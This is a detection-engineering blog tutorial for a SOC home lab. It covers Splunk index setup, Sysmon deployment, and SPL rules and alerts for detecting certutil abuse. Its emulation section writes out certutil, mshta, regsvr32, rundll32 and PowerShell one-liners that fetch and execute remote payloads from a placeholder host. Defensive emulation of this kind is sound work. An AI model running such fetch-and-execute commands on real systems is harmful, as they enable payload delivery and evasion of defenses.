>_ Exploit the Edge

Home › Cybersecurity

SOC Home Lab: Emulate LOLBins & Write Splunk SPL Detection Rules

Published 05 Oct 2026 · 5 min read

Configuring Dedicated Splunk Indexes for Windows Telemetry

By default, Splunk routes incoming events to the main index. For operational efficiency, query performance, and retention control, Windows endpoint logs—System, Security, PowerShell, and Sysmon—should land in a dedicated index. On a Windows host running the Splunk Universal Forwarder, edit C:\Program Files\SplunkUniversalForwarder\etc\system\local\inputs.conf:

[WinEventLog://Application]
disabled = 0
index = windows

[WinEventLog://Security]
disabled = 0
index = windows

[WinEventLog://System]
disabled = 0
index = windows

[WinEventLog://Microsoft-Windows-PowerShell/Operational]
disabled = 0
index = windows

[XmlWinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = 0
index = windows

Restart the Universal Forwarder service (Restart-Service SplunkForwarder) after saving.

Fixing Silent Event Drops

Assigning index = windows in inputs.conf does not create the index on the Splunk Enterprise indexer. If the target index is missing, Splunk silently drops incoming events—no warning, no fallback to main.

To resolve: 1. Log into Splunk Web on the indexer. 2. Navigate to Settings > Indexes > New Index. 3. Name it windows, set Max Size (e.g., 50 GB for a lab), Frozen Time Period (e.g., 30 days), and enable Data Integrity Check if desired. 4. Save, then verify with index=windows earliest=-24h | stats count by sourcetype.

Retention tip: For a home lab, keep hot/warm buckets on SSD and roll cold to slower storage. Set maxTotalDataSizeMB in indexes.conf if you manage indexes via configuration files rather than the UI.

Simulating Threat Activity with LOLBins (Certutil)

Living-off-the-Land Binaries (LOLBins) are signed Microsoft utilities that adversaries repurpose for payload delivery, defense evasion, and persistence. The LOLBAS project documents over 130 such binaries. Certutil.exe, mapped to MITRE ATT&CK T1105 (Ingress Tool Transfer) and T1140 (Deobfuscate/Decode Files), is a staple for file download and decode operations.

Run the following on your target Windows endpoint from a writable directory:

cd C:\Users\Public
certutil.exe -urlcache -split -f "http://example.com" test.txt

Flags explained: - -urlcache — displays or deletes URL cache entries; with a URL argument, fetches the resource. - -split — splits the download into chunks, evading simple size-based inspection. - -f — forces overwrite of existing cache/file.

Both Sysmon Event ID 1 (Process Create) and PowerShell Script Block Logging (Event ID 4104) capture this activity. Ensure Sysmon is installed with a configuration that logs command lines (see Sysmon section below).

Additional LOLBin Variants to Test

Extend coverage by emulating other common download vectors:

Binary Command Example MITRE Technique
mshta.exe mshta.exe http://example.com/payload.hta T1218.005
regsvr32.exe regsvr32 /s /n /u /i:http://example.com/payload.sct scrobj.dll T1218.010
rundll32.exe rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://example.com/payload.sct") T1218.011
powershell.exe powershell -c "iwr http://example.com/payload.ps1 -OutFile $env:TEMP\p.ps1; iex (gc $env:TEMP\p.ps1)" T1059.001

Log each execution, then verify ingestion before writing rules.

Sysmon Configuration for Rich Telemetry

Default Sysmon logging misses critical fields. Deploy a community configuration such as SwiftOnSecurity/sysmon-config or olafhartong/sysmon-modular. Key Event IDs to enable:

  • Event ID 1 — Process Creation (command line, parent image, hashes)
  • Event ID 3 — Network Connection (destination IP, port, protocol)
  • Event ID 7 — Image Load (DLLs, signed status)
  • Event ID 8 — CreateRemoteThread
  • Event ID 10 — Process Access
  • Event ID 11 — File Create
  • Event ID 13/14 — Registry Value/Key Set
  • Event ID 15 — File Create Stream Hash
  • Event ID 17/18 — Pipe Created/Connected
  • Event ID 22 — DNS Query
  • Event ID 23/24/25 — File Delete, Clipboard Change, Process Tampering

Install with: sysmon.exe -accepteula -i sysmonconfig.xml. Validate with Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 5 | Format-List.

Validating Telemetry and Writing Targeted SPL Rules

After executing the certutil test, confirm raw log arrival:

index=windows "urlcache"

Expand an event to inspect fields: ProcessName, CommandLine, ParentImage, User, Computer, EventCode (4688 for Security, 1 for Sysmon).

Refining Detection Logic

Broad searches for certutil.exe generate noise from legitimate certificate operations (AD CS, WSUS, SCCM). Effective detection isolates suspicious flag combinations:

index=windows
( sourcetype=XmlWinEventLog OR sourcetype=WinEventLog:Security )
certutil.exe
("-urlcache" OR "-split" OR "-f" OR "-decode" OR "-verifyctl")
| eval suspicious=case(
    like(CommandLine, "% -urlcache % -split % -f %"), "download_split_force",
    like(CommandLine, "% -decode %"), "decode_operation",
    1=1, "other_flag"
)
| stats count min(_time) as earliest max(_time) as latest by Computer User ProcessName CommandLine ParentImage suspicious
| convert ctime(earliest) ctime(latest)
| sort - latest

Explanation: - Filters to Windows security and Sysmon sourcetypes. - Matches the four flags most associated with payload staging. - Classifies the variant for triage. - Aggregates by host/user/command line to reduce alert volume.

False-Positive Suppression

Legitimate admin tools (e.g., certutil -verifyctl for CTL updates) may trigger. Add a lookup of approved parent processes or command-line hashes:

| lookup certutil_allowlist CommandLineHash OUTPUT approved
| where isnull(approved)

Populate the lookup with hashes from a baseline week of clean activity.

Setting Up Alerts and Testing the Detection Pipeline

Convert the refined query into an automated alert:

  1. In Search & Reporting, run the final SPL and click Save As > Alert.
  2. Title: Suspicious CertUtil Download Flags Detected.
  3. Alert Type: Scheduled, run every 5 minutes, cron */5 * * * *. Real-time alerts consume search-head resources; avoid in production.
  4. Time Range: Relative, -5m@m to @m (aligns with schedule).
  5. Trigger Condition: Per-Result (one alert per matching event).
  6. Throttle: Suppress for 1 hour per Computer, CommandLine to prevent storming.
  7. Trigger Actions: Add to Triggered Alerts, optionally Send Email or Webhook to a SOAR/Slack endpoint.

Validating the Alert Pipeline

Return to the target Windows machine and run a modified test:

certutil.exe -urlcache -split -f "http://example.org" alert_test.txt

In Splunk Web, navigate to Activity > Triggered Alerts. The alert should appear within the schedule window. Drill down to confirm the raw event, extracted fields, and suspicious classification.

Building a Detection Dashboard

Create a Splunk dashboard panel for ongoing visibility:

index=windows
( sourcetype=XmlWinEventLog OR sourcetype=WinEventLog:Security )
certutil.exe ("-urlcache" OR "-split" OR "-f" OR "-decode")
| timechart span=1h count by suspicious

Add a second panel showing top offending hosts:

...same base search...
| stats count by Computer User CommandLine
| sort - count
| head 20

SOC Lab Detection Engineering Checklist

Use this checklist when building and testing new detection rules in your home lab:

  • [ ] Verify Index Configuration: Confirm the destination index exists on the indexer before updating endpoint inputs.conf.
  • [ ] Confirm Raw Ingestion: Run a broad search (index=<your_index> "<keyword>") to verify telemetry flow.
  • [ ] Deploy Sysmon Config: Install a hardened Sysmon configuration (SwiftOnSecurity or modular) and validate Event IDs 1, 3, 7, 11, 22.
  • [ ] Enable PowerShell Logging: Turn on Module Logging and Script Block Logging via Group Policy (Administrative Templates > Windows Components > Windows PowerShell).
  • [ ] Extract Command-Line Context: Identify process names, parent processes, specific CLI flags, and network indicators.
  • [ ] Map to MITRE ATT&CK: Tag each rule with technique IDs (e.g., T1105, T1218.005) for coverage tracking.
  • [ ] Tune Detection Rules: Add allowlist lookups, parent-process filters, and frequency thresholds to reduce false positives.
  • [ ] Configure Alert Actions: Map detection queries to scheduled alerts with throttling; add enrichment (VT, AbuseIPDB) via lookups or external scripts.
  • [ ] Validate End-to-End: Re-run modified commands on the target host to confirm alert triggering and dashboard population.
  • [ ] Document the Rule: Record logic, data sources, MITRE tags, known false positives, and revision history in a detection catalog (Markdown, Notion, or Git).

Next Steps

  1. Add the remaining LOLBin variants (mshta, regsvr32, rundll32) to your test corpus and write parallel SPL rules.
  2. Build a MITRE ATT&CK coverage matrix in a dashboard—count rules per technique.
  3. Integrate a threat-intel feed (AlienVault OTX, Abuse.ch) to enrich destination IPs in certutil network events.
  4. Automate rule deployment with Splunk's savedsearches.conf in a version-controlled app (local/), enabling CI/CD for detection engineering.

FAQ

Why does certutil.exe trigger false positives in Windows environments?

Built-in services and systems management software (such as Active Directory Certificate Services, SCCM, and WSUS) frequently execute certutil to verify Certificate Revocation Lists or download trust catalogs. High-fidelity detections focus specifically on payload staging arguments like -urlcache, -split, and -decode rather than simple process execution.

Why are events dropped when specifying index = windows in inputs.conf?

Splunk Enterprise requires an index stanza to be configured on the indexer before it accepts data for that index. If the index does not exist, incoming events sent to that index are dropped silently without routing back to the default main index.

Why use scheduled alerts instead of real-time alerts in Splunk?

Real-time alerts maintain an open search process that consumes dedicated CPU cores continuously on the search head and indexers. Running scheduled alerts every 5 minutes over a matching relative time window drastically reduces server load while remaining responsive enough for SOC operations.

Which Sysmon event IDs provide the best visibility into LOLBin activity?

Sysmon Event ID 1 (Process Create) captures full command-line arguments and parent process images. Event ID 3 (Network Connection) captures external connections initiated by binaries like certutil or mshta, and Event ID 11 (File Create) records payloads written to disk.

Sources

  1. DEV Community - Building a SOC Home Lab II: Local Threat Emulation & SPL Detection Engineering
  2. Splunk Documentation - Create and manage indexes
  3. MITRE ATT&CK - Technique T1105: Ingress Tool Transfer
  4. LOLBAS Project - Certutil
  5. SwiftOnSecurity Sysmon Configuration
  6. Microsoft - Enable PowerShell Script Block Logging